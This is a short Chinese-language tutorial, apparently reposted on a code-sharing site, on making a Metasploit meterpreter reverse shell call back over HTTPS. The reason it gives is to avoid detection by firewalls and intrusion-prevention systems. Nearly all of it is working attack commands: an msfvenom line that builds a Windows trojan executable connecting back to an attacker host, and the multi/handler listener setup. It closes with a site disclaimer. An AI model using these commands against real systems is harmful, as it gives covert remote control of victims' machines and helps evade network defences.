MSF反彈meterpreter會話(使用https協議回連)


如果反彈的shell用明文(如http)傳輸控制指令,那么很容易被防火牆、IPS等設備檢測出來從而中斷TCP連接。因此使用https協議進行回連就能避免這些問題。

第一步:生成木馬客戶端

msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o /tmp/reverse_https.exe LHOST=192.168.106.10 LPORT=8443

第二步:啟動MSF等待回連

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST 192.168.106.10
set LPORT 8443
run

第三步:運行木馬客戶端即可在MSF控制台獲取meterpreter會話。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM